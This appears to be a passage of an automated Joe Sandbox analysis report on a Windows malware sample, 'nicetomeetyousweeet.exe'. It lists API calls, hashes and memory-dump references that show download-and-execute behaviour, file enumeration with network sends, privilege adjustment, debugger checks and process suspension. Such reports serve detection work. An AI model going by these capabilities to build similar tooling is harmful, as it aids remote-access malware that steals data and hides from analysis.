                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                • String ID:
                                                                                • API String ID: 3534403312-0
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DownloadExecuteFileShell
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$open
                                                                                • API String ID: 2825088817-2911420308
                                                                                • Opcode ID: 0569d32d956a677e31188ff047207d90508ee8dc6b8b30382d534a6bcd887559
                                                                                • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                • Opcode Fuzzy Hash: 0569d32d956a677e31188ff047207d90508ee8dc6b8b30382d534a6bcd887559
                                                                                • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                APIs
                                                                                  • Part of subcall function 0079271E: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0079273E
                                                                                  • Part of subcall function 0079271E: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0079275C
                                                                                  • Part of subcall function 0079271E: RegCloseKey.ADVAPI32(00000000), ref: 00792767
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0078E86A
                                                                                • ExitProcess.KERNEL32 ref: 0078E8D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                • String ID: pth_unenc$BG
                                                                                • API String ID: 2281282204-2233081382
                                                                                • Opcode ID: 893b02ec2893ac076e1b48ec4804a82b241512304dbf54cdddd5c3cf734e141d
                                                                                • Instruction ID: 0caf45291c87f558dc9af1631e1ff2d68cdb2c146413b5157d08f4fdce54a1dc
                                                                                • Opcode Fuzzy Hash: 893b02ec2893ac076e1b48ec4804a82b241512304dbf54cdddd5c3cf734e141d
                                                                                • Instruction Fuzzy Hash: 6521F831F84300E7DA1876799C5FA7E35995B80712F544028F415672DBFF6E8E0283A7
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNextsend
                                                                                • String ID: x@G$x@G
                                                                                • API String ID: 4113138495-3390264752
                                                                                • Opcode ID: ab3188fd4a5cbfac4f43ad498b618a4c3e8b323c43051b394baa4432c92144ed
                                                                                • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                • Opcode Fuzzy Hash: ab3188fd4a5cbfac4f43ad498b618a4c3e8b323c43051b394baa4432c92144ed
                                                                                • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00786D44
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00786E0C
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNextsend
                                                                                • String ID: x@G$x@G
                                                                                • API String ID: 4113138495-3390264752
                                                                                • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                • Instruction ID: 9ab6fa55baf198b90a3b0870cdaecdd34d38bbb507b4d2544d56bb1e592e2bf5
                                                                                • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                • Instruction Fuzzy Hash: 7C21B431684245EFC714FB64DD99DEFB7ACEF80351F400929F68692192EF389A0AC752
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                  • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                  • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                • API String ID: 4127273184-3576401099
                                                                                • Opcode ID: e058ffd10f7cf657ce5424fe27c8305cdcee6081d0d8a7eb5147209b2a7de27e
                                                                                • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                • Opcode Fuzzy Hash: e058ffd10f7cf657ce5424fe27c8305cdcee6081d0d8a7eb5147209b2a7de27e
                                                                                • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                  • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                  • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                • API String ID: 4127273184-3576401099
                                                                                • Opcode ID: 019e56e2c93cdfed7ba7db431c15a776d9c81b0efa82d3df3d91d6e49c9cae9f
                                                                                • Instruction ID: f2617a255fd7246e173cf48333a5ec3092ca3a632a8680fa2b2f8bd5747a896b
                                                                                • Opcode Fuzzy Hash: 019e56e2c93cdfed7ba7db431c15a776d9c81b0efa82d3df3d91d6e49c9cae9f
                                                                                • Instruction Fuzzy Hash: 9EF0623278011422D529357A8E2FBEE1801D796B20F65402FF202A57D6FB8E46D142DE
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00450B61
                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                • String ID:
                                                                                • API String ID: 4212172061-0
                                                                                • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 007D0DC8
                                                                                • _wcschr.LIBVCRUNTIME ref: 007D0E58
                                                                                • _wcschr.LIBVCRUNTIME ref: 007D0E66
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 007D0F09
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                • String ID:
                                                                                • API String ID: 4212172061-0
                                                                                • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                • Instruction ID: acc2e9b25ec8c04a935f76aeb6c051d1f420d1836248145ed45acba691acd21a
                                                                                • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                • Instruction Fuzzy Hash: 9461D671600205EADB24BB75DC4AFAA73B8EF48710F14556BF909DB281EA7CE940C7E0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$FirstH_prologNext
                                                                                • String ID:
                                                                                • API String ID: 301083792-0
                                                                                • Opcode ID: f4f51dc7378ae6c5969491192f148f2f5adf325efaa17fd3a5c6d868f2cde540
                                                                                • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                • Opcode Fuzzy Hash: f4f51dc7378ae6c5969491192f148f2f5adf325efaa17fd3a5c6d868f2cde540
                                                                                • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00448067
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • GetTimeZoneInformation.KERNEL32 ref: 00448079
                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                • String ID:
                                                                                • API String ID: 806657224-0
                                                                                • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                • Instruction ID: ab6739d36243922ba69d1bbe12a1b6ae93f84769bc63f42ae41568d8b76a7737
                                                                                • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                • Instruction Fuzzy Hash: 8731DA70904205DFEB149F68CC8186EBBF8FF05760B2442AFE054AB2A1DB349A42DB18
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 2829624132-0
                                                                                • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                APIs
                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00795BC2
                                                                                • LoadLibraryA.KERNEL32(0046B9C0,0046B9B0), ref: 00795BD7
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00795BDE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressExitLibraryLoadProcWindows
                                                                                • String ID:
                                                                                • API String ID: 1366546845-0
                                                                                • Opcode ID: 8e87e24a53ed8da24effc80685a90e9af26916bb391603b6d9938ccb756c893d
                                                                                • Instruction ID: 8d99ebebf987f8447a02e6c09c79c5fb6f9a74b9e626a7b0d2612796cd101916
                                                                                • Opcode Fuzzy Hash: 8e87e24a53ed8da24effc80685a90e9af26916bb391603b6d9938ccb756c893d
                                                                                • Instruction Fuzzy Hash: 882175B0684711DBCF15BBB0989EAAE23999F40350F904C29B60297583EF6CCD07D366
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434403), ref: 0043A755
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434403), ref: 0043A75F
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434403), ref: 0043A76C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 007BA9BC
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 007BA9C6
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 007BA9D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                • Instruction ID: d534e652730137fa57deaf66f82ac0fb96fd66e65ef392e5a0d5a51dcf2f2e0c
                                                                                • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                • Instruction Fuzzy Hash: 9E31B275901219EBCB21DF64D8897DCBBB8BF08310F5042EAE80CA6251EB749F818F45
                                                                                APIs
                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00471B2C,00000000,007B282C,00000034,00471B2C,?,?), ref: 007B2BB3
                                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,007B28BE,00000000,?,00000000), ref: 007B2BC9
                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,007B28BE,00000000,?,00000000,0079D9C7), ref: 007B2BDB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID:
                                                                                • API String ID: 1815803762-0
                                                                                • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                • Instruction ID: 9d8a8b7343bcd392177c438194384be65d9384dca9c003eb9b2b164183e3d92c
                                                                                • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                • Instruction Fuzzy Hash: 19E0923130D310BBEB310F15BC08FA73B94DB81B71F600A38F251E40E5EA6588419518
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 00442575
                                                                                • TerminateProcess.KERNEL32(00000000,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 0044257C
                                                                                • ExitProcess.KERNEL32 ref: 0044258E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000000,?,007C2791,00000000,0046DAE0,0000000C,007C28E8,00000000,00000002,00000000), ref: 007C27DC
                                                                                • TerminateProcess.KERNEL32(00000000,?,007C2791,00000000,0046DAE0,0000000C,007C28E8,00000000,00000002,00000000), ref: 007C27E3
                                                                                • ExitProcess.KERNEL32 ref: 007C27F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                • Instruction ID: 758a9f119209ef7b81ed25ba5c8842355b8ebce7120e298ff33a80361df6d1e9
                                                                                • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                • Instruction Fuzzy Hash: 5DE0B636004608EFCF11AF55ED49E893B69EB50742F00407CF9098A533CB39ED82CA94
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                                                • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                                                • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenSuspend
                                                                                • String ID:
                                                                                • API String ID: 1999457699-0
                                                                                • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                                                • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                                                • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                                                • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenResume
                                                                                • String ID:
                                                                                • API String ID: 3614150671-0
                                                                                • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                                                • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
